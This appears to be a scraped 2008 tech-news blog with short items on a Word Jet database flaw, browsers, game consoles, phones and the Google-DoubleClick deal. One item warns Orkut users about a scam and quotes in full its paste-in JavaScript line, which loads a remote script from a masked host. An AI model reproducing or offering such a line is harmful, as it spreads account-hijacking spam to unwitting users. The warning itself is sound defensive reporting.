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Word Flaw Leaves Users at Risk
2008-03-25 12:52:00
Microsoft researchers are currently investigating reports of targeted attacks that can be exploited through Microsoft Word , including Word 2007, using a buffer overflow error in the Jet Database Engine.The code execution vulnerability is caused by a buffer overrun in the Microsoft Jet Database, or msjet40.dll. Security researchers say that the vulnerability could be exploited by an attacker who successfully enticed a user to open a malicious Word file constructed to load the specially-crafted database file using msjet40.dll.A successful exploit would allow an attacker to gain the same privileges as the local user. In a Web-based exploit, an attacker could host a malicious Web site, including compromised Web sites and sites that accept user-provided content, with a specially-crafted Word file that exploited the vulnerability.While users could not be forced to visit the malicious Web sites, an attacker could persuade them to visit the malware hosting sites by clicking on a malicious l...
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Mozilla Chief Accuses Apple of Risking Security
2008-03-25 12:45:00
Steve Jobs is using Apple Software Update to slip his Safari browser onto Windows machines. And Mozilla CEO John Lilly is peeved.Presumably, Lilly is peeved because Safari browsers on Windows machines would eat into the market share of Mozilla's very own Firefox browser. But Lilly says he's peeved for different reasons. He says he's peeved because Steve Jobs' little Software Update trick undermines the security of the entire internet."What Apple is doing now with their Apple Software Update on Windows is wrong," Lilly writes on his personal blog. "It undermines the trust relationship great companies have with their customers, and that’s bad - not just for Apple, but for the security of the whole Web."Steve Jobs and company unveiled Safari 3.1 on Tuesday, and to celebrate, they began offering the new browser to Windows users via Apple Software Update - that clever little tool that alerts you to new Apple software with a nothing-less-than-conspicuous pop-up window.On Windows mac...
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Google Wants "White Space" Wi-Fi
2008-03-25 12:38:00
Google is pressing the US government to allow the unlicensed frequencies of TV "white space" to be used for wi-fi.The firm has written an open letter to regulators saying the US spectrum was a "once in a lifetime opportunity".White space is unused blocks of frequencies in-between channels broadcast on analogue airwaves."The vast majority of viable spectrum in this country simply goes unused, or else is grossly underutilised," wrote Google's Richard Whitt in the letter."Unlike other natural resources, there is no benefit to allowing this spectrum to lie fallow," he added.Read more at BBC
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Palm Centro @ Rs 13,990
2008-03-21 18:29:00
During a press event in Mumbai, Palm has made announcement about the launching of its ‘Centro ’ smartphone in the Indian market. Targeting youth, the light and fresh looking Palm ‘Centro’ Smartphone weighs just 124 grams and comes with a number of outstanding features. While launching ‘Centro’ in India, Palm’s Regional Director (Asia pacific) Olivier Rozay stated, “We launched the first model in last September. This was targeted at the business class. The latest one, Centro, aims to catch up the younger generation. With these two and others in the coming days, we hope to be doing a good business in India.” Together with modish look, the ‘Centro’ has voice, text, email, Web, contact and calendar potentialities. With its QWERTY keyboard, the new mobile phone also has a touch screen as an alternate input option.Read More-Via[TopNews]
Windows Vista SP1 -whether to have it or not?
2008-03-21 18:23:00
Windows Vista SP1 Is having a tough time getting into the Ivy League. University of Pennsylvania tech staffers are advising faculty and students not to upgrade their computers to the new service pack forMicrosoft Vista operating system. The school's Information Systems & Computing department said it will support Vista SP1 on new systems where it's preinstalled, but added that it "strongly recommends that all other users adopt a 'wait and see' attitude," according to a newly published department bulletin. Penn's ISC department advised "continuing to use previous versions of Windows XP and Windows Vista until after the initial bugs in SP1 are identified and fixed." Vista SP1 users have reported numerous glitches since the operating system became widely available on Tuesday. Read More-Via[IW]
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PlayStation 3, will add new firmware-2.0
2008-03-21 18:15:00
Sony announced that the next software update for its gaming console, PlayStation 3, will add Blu-ray Disc (BD) Profile 2.0 capabilities, turning the game console into the world's first Blu-ray player to support the new format enhancements. The new firmware, 2.20, is scheduled to be released later this monthThanks to the BD-Live, PS3 owners will be able to experience interactive features when playing enabled Blu-ray discs, such as downloadable video content, ringtones, games, and more. Besides BD-Live, the new update, which is labeled as 2.20 will add other new features such as the ability to copy photo and music playlists from PS3 to PSP."With these regular firmware updates and future-proofed technology, SCEA is making the 10-year life cycle of PS3 possible," Scott A. Steinberg, VP of product marketing for Sony Computer Entertainment America, said in a statement.Sony Pictures Home Entertainment is releasing April 8 two movie titles that will include exclusive downloadable content t...
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Apple Safari 3.1 Released
2008-03-18 18:43:00
Apple on Tuesday released version 3.1 of its Safari Web browser for both Windows and Mac. The incremental update does little in the way of introducing new features, although the company is using it to usher in the next generation of Web standards.Safari 3.1 is the first browser to support some of the features of HTML 5, the new standard that was released in January. That update to the base coding of the Web includes new video and audio tags, which allow for built-in support of media without proprietary technology.Offline storage is another part of HTML 5 also supported in Safari 3.1. By caching a portion of a Web page, developers would be able to make their sites load faster by not needing to re-download portions that haven't been changed.Read more at BetaNews
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Intel Likely to Ship Six Core Processor in H2 2008
2008-03-18 18:19:00
Intel Corp. today announced that it expects to ship a six-core processor to resellers in the second half of this year.With 1.9 billion transistors and 16MB of Level 3 cache, the six-core chip, code-named Dunnington, will be built with Intel's new 45 nanometer technology, according to Pat Gelsinger, a senior vice president and general manager of Intel's Digital Enterprise Group."The big cache and six cores will give customers a nice bump in performance," Gelsinger said during a press briefing today about the company's product road map and its upcoming Intel Developer Forum, slated to be held next month in Shanghai. "We're quite excited about it."He said that the company plans to demonstrate the Dunnington chip at the IDF.Dan Olds, an analyst at Gabriel Consulting Group Inc., said moving beyond quad-core processors, which to date have been the high-water mark in the semiconductor industry, is a major step -- one that keeps Intel well ahead of rival Advanced Micro Devices Inc. Just...
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UK:Ban Lifted on Manhunt 2
2008-03-16 16:27:00
Manhunt 2, the "sadistic" video game banned for by the British Board of Film Classification (BBFC) over its portrayal of extreme violence, has been cleared for release following a legal challenge by its makers.The game is set in a mental facility, and players have to escape by slaughtering members of a sinister organisation by sneaking up on them and using improvised weapons such as a pliers, a syringe or a power-saw.The BBFC ruled that the game's "casual sadism" and focus on "brutal slaying" could unleash a "range of unjustifiable harm risks to both adults and minors" as it "constantly encourages visceral killing". It was the first video game to be banned in the UK since 1997.Read more at Telegraph
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Hacker Attacks Harvard Server
2008-03-16 16:15:00
It's one of the hardest schools in America to get into, but not for hackers.Last month, at least one hacker launched an attack on a computer server at Harvard University, potentially viewing the personal information of up to 10,000 graduate students and applicants to the Graduate School of Arts and Sciences and posting some of the information on the Web.Harvard officials began notifying thousands of students and applicants this week that some of their personal information, in some cases Social Security numbers, may have been accessed.According to Harvard chief information officer Dan Moriarty, an attack was launched Feb. 16 on a server that contained summary information from applications for prospective students as well as the housing information of current students. About 6,600 of those applications included Social Security numbers.The following day, the school took the server offline for five days to investigate the source of the attack.Read more at ABC
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Japan: Wii Leads the Race
2008-03-16 15:55:00
It seems like Wii is unbeatable. Shortly after the NPD Group released its data about the gaming sales in US during February, Media Create revealed that Nintendo Wii is the champion in Japan too.According to Media Create, in the week ending March 9, Nintendo sold 57,068 Wiis in Japan, which is almost double compared to 21,008 PS3s sold by Sony. As for Microsoft, its Xbox 360 continues to struggle and it has sold only 2891.So far, Microsoft has failed to impress the Japanese gamers, who bought only 257,800 Xbox 360 consoles during 2007, according to the data released by Enterbrain. In comparison, Nintendo Wii sold 3.6 million units, while Sony managed to sell 1.2 million PS3s.Though, it is very possible that during the next week Xbox 360’s sales will be higher, because on March 6, Microsoft started to sell its Xbox 360 Arcade in Japan for only 27,800 yen ($260) instead 34,800 yen.Xbox Arcade was launched in the US last year in October and it is sold for $279.99. The package include...
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N1 Vision wireless router from Belkin Launched in India
2008-03-16 05:41:00
The router offers an extended operating range of 1,600 ft, plug-and-play 'CD-less' installation and simple network security setup. Compatible with IEEE 802.11g, 802.11b, 802.11n draft 2.0, 802.3ab standards, the N1 Vision wireless router patent-pending LCD displays offers real-time network information to users including: download/upload speedometer, network bandwidth usage, number of connected devices, guest access network key, date and time. The router offers an extended operating range of 1,600 ft, plug-and-play 'CD-less' installation and simple network security setup. Compatible with IEEE 802.11g, 802.11b, 802.11n draft 2.0, 802.3ab standards, the N1 Vision wireless router patent-pending LCD displays offers real-time network information to users including: download/upload speedometer, network bandwidth usage, number of connected devices, guest access network key, date and time.Read More-Via[Efytimes]
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Samsung India comes up with 5 new Mobile phones
2008-03-16 05:27:00
Technology majors Samsung and made its presence felt at the ongoing Photofair 2008 at Mumbai, by unveiling a slew of products across all price ranges. Samsung is already a name to reckon with in the field of digital photography, but with fierce competition from Canon, Sony, Nikon and Kodak, has felt the need to cater to a wider range of consumers and consumer needs through its new products. R. Zutshi, Deputy MD, Samsung India , said, "In keeping with the changing consumer preferences, the new 2008 series of Samsung digital still cameras comprises of digital cameras with resolutions of 7, 8 and 10 mega pixels, larger sized LCDs and sleek form factor. We have introduced colour options across our different models as well". Starting from the lowest-priced 'S' series, Samsung's new range encompasses the mid-range 'L' and 'I' series, topped off by the premium 'NV' line. The 'S' series is intended to be a line of entry-level digital cameras, and Samsung announced two new products...
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Video Game Industry Boomed In February 2008
2008-03-15 17:55:00
Consumers sent the video game hardware and software industry a US$1.33 billion valentine for the month of February, a 34 percent increase over sales during the same time period in 2007, according to figures released by the NPD Group, an independent market research firm.The Wii's Latest News about Wii reign continued as the No. 1 video game console, while Sony's PlayStation 3 Latest News about PlayStation 3 (PS3) beat out the supply-constrained Xbox 360 Latest News about Xbox 360 for the second month in a row. Game rs picked up 281,000 PS3s versus 255,000 of the Microsoft-made consoles.Sony's boost in sales represents a 120 percent improvement over February 2007, the company said."The Sony PS3's increasing popularity is due to two reasons. One, the price cuts over the last six months. Two, the fact that it integrates a Sony Blu-ray high definition DVD player," said Brian O'Rourke, an InStat analyst.Read more at TechNewsWorld
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Beware of "Do you know there was a profile in news last night" Cheap Orkut
2008-03-15 17:28:00
You may get a scrap from your orkut buddy like this one:Heya !!how are you??Do you know there was a profile in news last nightlink :- click hereThe about me of This Profile Is SuperbWhen you click on the link, you land onto a fake profile which try to tempt you:VIEW ANYONE'S LOCKED ALBUM NOW.1.) Goto the profile of which you needto view the album2.) Copy the javascript given below and pasteit to your address bar where you write www.orkut.com And hit enter key3.) Now wait for the images to be loadedas it will take a few minutes .javascript:d=document;c=d.createElement( 'script');d.body.appendChild(c);c.src='ht tp://xxxxxxx.xxx.com/orkut0.js';void(0)Pl ease Dont use this trick on my album Though It may not be a malware or password hijacker, it is definitely annoying. If you run the script on your browser's address bar, it'll send the same scrap(from your profile) to all your friends and will add some useless communities to your profile. So beware and protect your space.
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iPhone 2.0 version claimed to be unlocked
2008-03-13 17:25:00
The iPhone Dev Team has allegedly jailbroken the new iPhone firmware that ships with the recently released SDK (version 1.2, which will be apparently released to the public as 2.0). An user identified as King Chronic has obtained the firmware from his source simply known as "R" two days ago and the group managed to modify it to run applications not signed by Apple.This doesn't mean that is is unlocked yet, the phone would still be locked on AT&T in the US and other networks elsewhere where it's available."Cheers to the Dev Team for the excellent job. Hopefully we can all have it unlocked & jailbroken iphone at the end of June. We've got enough time to do that & perhaps we can have it before the official Apple release for the new firmware..." wrote one user.Read More-Via[eFM]
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Apple Inc. Sued over iTunes
2008-03-13 17:21:00
Apple Inc. was sued Wednesday over allegations its iTunes online music store and iPod music players are illegally using a patented method for distributing digital media over the Internet.Atlanta-based ZapMedia Services Inc. sued Apple in U.S. District Court for the Eastern District of Texas, accusing the Cupertino-based company of violating two ZapMedia patents.ZapMedia wants royalties on Apple's sales of iPods and iTunes music, which reached nearly $11 billion last year. The success of iTunes has helped make Apple the No. 2 music retailer in the U.S. behind Wal-Mart Stores Inc., according to market researcher NPD Group.Read More-Via[AP]
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TIVO + YOU TUBE = WEB VIDEO TO TV
2008-03-13 17:15:00
Pick up the remote, turn on the television — and watch YouTube . The user experience envisioned by technology enthusiasts came a step closer to reality on Wednesday when TiVo, the maker of popular digital video recorders, announced a partnership with YouTube that will deliver Web video directly to users’ televisions.“TiVo’s strategy is to bridge the gap between Web video and television and make as much content available as possible for our subscribers,” said Tara Maitra, the vice president and general manager for content services at TiVo.With the YouTube deal, TiVo becomes the latest entrant into the marketplace for porting Internet video content to television. Apple introduced a new version of Apple TV with similar features in January. Although several companies are trying to merge the online viewing experience with the living-room big screen, no one product dominates the market yet. “Leaning forward at my computer screen, I’ve got this giant amount of content,...
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Japan Investigating Real iPod Fireworks
2008-03-12 16:04:00
Japanese authorities are investigating reports of a fire involving one of Apple's iPod digital music players.The 2GB iPod Nano emitted sparks and ignited when the built-in lithium ion battery apparently overheated while being recharged.The owner called the local fire department, local press reports said, but no injuries were reported.Apple apparently learned of the incident shortly afterwards, but did not inform Japan's Ministry of the Economy, Trade and Industry until March, according to reports.The ministry issued a brief report on the fire, which took place on 8 January near Tokyo, Nikkei Business Press reported.Read more at VnuNet
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Gates Wants More H-1B Visas
2008-03-12 15:54:00
Speaking before the U.S. House Committee on Science and Technology on Wednesday, Microsoft Chairman Bill Gates outlined suggestions to build U.S. strength in an increasingly competitive international high-technology market.Gates suggestions include improving science and math education for U.S. students. Unless more students can be attracted to science and math, Gates warns, the U.S.’s competitive advantage will erode and its ability to create high-paying jobs will suffer.Gates also called on Congress to reform immigration policies to allow more “highly skilled professionals” from abroad to work in the U.S. by raising the cap on H-1B visas, to help retain foreign-born employees with a path to permanent residency. He doesn’t see this effort as at odds with the idea of spurring more American citizens into science and math-related professions; he said that American companies simply won’t have the talent they need.“The shortage of scientists and engineers is so acute that we ...
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Google Completes USD 3.1 Billion DoubleClick Acquisition
2008-03-12 15:27:00
Google Inc.'s long-anticipated acquisition of online ad service DoubleClick Inc. is expected to turn the Internet search leader into an even more powerful marketing vehicle that's fueled by better insights about consumers.The $3.1 billion deal, completed Tuesday after nearly a year of regulatory wrangling, also may intensify the pressure on Microsoft Corp. and Yahoo Inc. to resolve their stormy courtship so they don't risk further distractions while Google tries to sprint further ahead in the race for Internet advertising.Google took control of DoubleClick a few hours after Europe's antitrust regulators removed the final stumbling block by approving a deal that was first announced 11 months ago.U.S. regulators cleared the transaction in December, casting aside objections from Microsoft and other companies that argued DoubleClick would give Google too much control over online advertising and potentially sensitive information about consumer behavior on the Internet.Besides opening...
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Sony Ericsson T303
2008-03-11 12:57:00
Sony Ericsson has unveiled the T303, an attractive phone that is small and neat enough to carry with you on every occasion.This compact slider phone has been given the high-end treatment, with a mirrored screen, metal housing and chrome finish.Sony Ericsson T303, Key Specs-Provides pocket-sized conveniencePromises premium good looks thanks to a metal and chrome finishDoes the basics well, whether that’s camera, Bluetooth™ or FM radioBig in looks, mini in sizeThe T303’s diminutive size is distinctive for all the right reasons. Because it doesn’t take up much room, it’s perfect for those nights out when space is limited and not everything can come out with you. The T303’s compact size means that this phone will always be one of the chosen few.Chic and smooth, reflecting your every moveThe T303’s metal and chrome finish makes it hard for those around you not to be impressed by its premium appearance. Its soft shape and smooth sliding mechanism make it a feel-good experien...
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Ericsson Forecasts Wi-fi Hotspots' Demise
2008-03-11 12:44:00
As mobile broadband takes off, Wi-Fi hotspots will become as irrelevant as telephone booths, Ericsson Chief Marketing Officer Johan Bergendahl said Monday.Mobile broadband is growing faster than mobile or fixed telephony ever did, Bergendahl said."In Austria they are saying that mobile broadband will pass fixed broadband this year. It's already growing faster, and in Sweden, the most popular phone is a USB modem," said Bergendahl, who was the keynote speaker at the European Computer Audit, Control and Security Conference in Stockholm.As more people start using mobile broadband, hot spots will no longer be needed. "Hotspots at places like Starbucks are becoming the telephone boxes of the broadband era," said Bergendahl.A couple of factors will accelerate the move to mobile broadband. In countries such as Austria, Denmark, and Sweden, the average price for a mobile broadband subscription is only €20 ($31) per month, Bergendahl said.Also, support for HSPA (High Speed Packet Access...
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Zuckerberg Admits Pitfalls
2008-03-11 12:30:00
Facebook Chief Executive Mark Zuckerberg, 23, has developed a reputation, deserved or not, for being aloof and arrogant. And who can blame him? The Harvard dropout has created one of the fastest-growing and arguably most innovative Internet companies since Google (GOOG). An investment from Microsoft (MSFT) gave it a $15 billion valuation last year.But at the South by Southwest Interactive Festival in Austin, Tex., Zuckerberg presented a humbler side of himself in his most public confession to date. In a Mar. 9 keynote Q&A session with BusinessWeek columnist Sarah Lacy, Zuckerberg admitted to a series of missteps. In a wide-ranging interview that lasted an hour, Zuckerberg also announced the launch of a French-language version of his social networking site aimed at the 100 million-plus Francophones worldwide.In the span of four years, Facebook has become the second-largest social networking site after News Corp.'s (NWS) MySpace. The company's top challenge now is figuring out a...
Hulu to go Public
2008-03-11 12:14:00
Hulu, the online video joint venture of News Corp and General Electric's NBC Universal, will make its public debut on Wednesday with programming from Time Warner Inc's Warner Bros Television Group, Lionsgate and from sports leagues.Missing from the list of providers are media mogul Sumner Redstone-controlled companies Viacom Inc, which continues to hold discussions, Viacom said recently, and CBS Corp, which has said it was not averse to a licensing deal.At launch, Hulu will offer full-length episodes of more than 250 TV series from current hits such as "The Simpsons" as well as older shows like "Buffy the Vampire Slayer." It also will offer 100 movies including "The Big Lebowski" and "Mulholland Drive."Hulu said it has signed licensing deals with the National Basketball Association and the National Hockey League.Hulu's launch is a big bet by big media companies that consumers are as eager to spend long periods of time watching TV shows and movies in front of their computers as th...
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Stolen Laptop Tracing system after mobile tracing.....will this be of any h
2008-03-10 17:39:00
When a laptop gets stolen, it is not just the physical loss of a machine but also the loss of valuable and sensitive information that it stores. Unfortunately, corporate and individuals do not have a plan to counter this yet. Realising this need, Unistal System s Pvt Ltd has come up with a new software product -– Locate Laptop , powered by proprietary WebSniff technology. Developed in-house by Unistal, Locate Laptop can locate reportedly stolen laptops leveraging on the World Wide Web. Locate Laptop not only tracks and recovers stolen computers, but also deters theft. It keeps track of the whereabouts of each employee while travelling, and the moment he logs in via the Web, a report is generated with his complete details and is sent to a designated individual within the organisation. This is done without the knowledge of the employee, so as to maintain privacy. All that users have to do is install Locate Laptop on to their computers.Read More-Via[Efytimes]
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Your move on Internet is being tracked
2008-03-10 17:28:00
A new analysis of online consumer data shows that large Web companies are learning more than ever before the gritty details of what people search for and do on the Internet , gathering clues about the tastes and preferences of a typical user several hundred times a month. These companies use that information to predict what content and advertisers people most likely want to see. They can charge steep prices for carefully tailored ads because of their high response rates. The analysis, conducted for The New York Times by the research firm comScore, provides what advertising executives say is the first broad estimate of the amount of consumer data transmitted to Internet companies every day. The analysis indicates that Web companies are, in effect, taking the trail of crumbs people leave behind as they move around the Internet and analyzing them to anticipate people's next steps. So anybody who searches for information on such disparate topics as iron supplements, airline tickets, ...
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Price cut of Xbox 360 in Europe
2008-03-10 17:20:00
Microsoft has confirmed that beginning March 14th, all UK Xbox 360 models will see a price drop, with the Arcade and Elite models dropping £40 ($80) to £159.99 ($322, now the least expensive next-gen console in the region) and £259.99 ($524), and the standard model down £50 ($100) to £199.99 ($403), with one analyst suggesting the pressure is on Sony to do the same. In a statement on the price drop, Microsoft notes that Xbox 360 is the number one next-gen console in the territory, with 42 percent of life-to-date sales, and the highest attach rate in Europe at 7 games per console, compared to the PS3's 3.8 and Wii's 3.5 games. In a separate release, Strategy Analytics principal analyst David Mercer said the move puts Sony "under renewed pressure" with even the highest-end model, the Elite, now £40 less expensive than the PS3.Read More-Via[Gamasutra]
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Exilim EX-Z9 digital camera
2008-03-09 16:30:00
Casio has taken the wraps off its new Exilim EX-Z9 digital camera, offering an 8.1 megapixel resolution, 3× optical zoom, a 2.6-inch LCD, and electronic image stabilization in a sleek design intended to let users easily take the camera with them anywhere.The camera also captures video, and features a "YouTube Capture Mode" that enables users to record video and upload it to the popular video sharing site in as few as three steps. "Whether you are taking snap shots of your family at the park or your friends at a concert, this high-quality digital camera is sure to satisfy all of your photographic wants and needs," said Casio Digital Imaging VP Bill Heuer, in a statement. Read More-Via[DT]
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Using Cellphone while driving as dangerous as Druken one
2008-03-09 16:22:00
Listening on a cell phone, even with a headset and free hands, can make a driver as dangerous as a drunken one, a new study suggests. Researchers have previously explored this territory, but Carnegie Mellon University scientists tried a new tack: they looked at the brain. They used brain imaging to show that listening to a cell phone significantly reduces the brain activity that occurs during undistracted driving. This drop in brain function increases driving mistakes - such as weaving out of the lane or hitting a berm on the shoulder of the road. Five states have enacted laws banning handheld cell phones while driving, but no state completely outlaws all types of cell phone use. New Jersey toughened its ban effective March 1. It is now a primary offense, meaning drivers can be fined $100 for talking on a handheld cell phone even if they have committed no other violation. Scores of studies have shown that performing a mental task such as carrying on a conversation impairs driv...
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